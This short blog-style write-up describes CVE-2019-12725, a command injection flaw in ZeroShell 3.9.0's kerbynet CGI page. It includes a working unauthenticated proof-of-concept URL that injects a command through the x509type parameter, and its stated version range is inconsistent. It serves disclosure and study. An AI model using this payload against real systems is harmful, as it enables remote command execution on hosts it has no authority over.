Zeroshell 3 9 0 Remote Command Execution Vulnerability Cve 2019 12725
Zeroshell 3 9 0 Remote Command Execution Vulnerability Cve 2019 12725
ZeroShell 3.9.0 Remote Command Execution Vulnerability CVE-2019-12725
Vulnerability Description
ZeroShell 3.9.0 has a command execution vulnerability, and the /cgi-bin/kerbynet page, the x509type parameter filtering is not strict, resulting in an attacker being able to execute arbitrary commands.
Vulnerability Impact
ZeroShell < 3.9.0
Network surveying and mapping
Vulnerability reappears
The login page is as follows
The verified POC is
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27
If you gain something, just like it
This post is licensed under CC BY 4.0 by the author.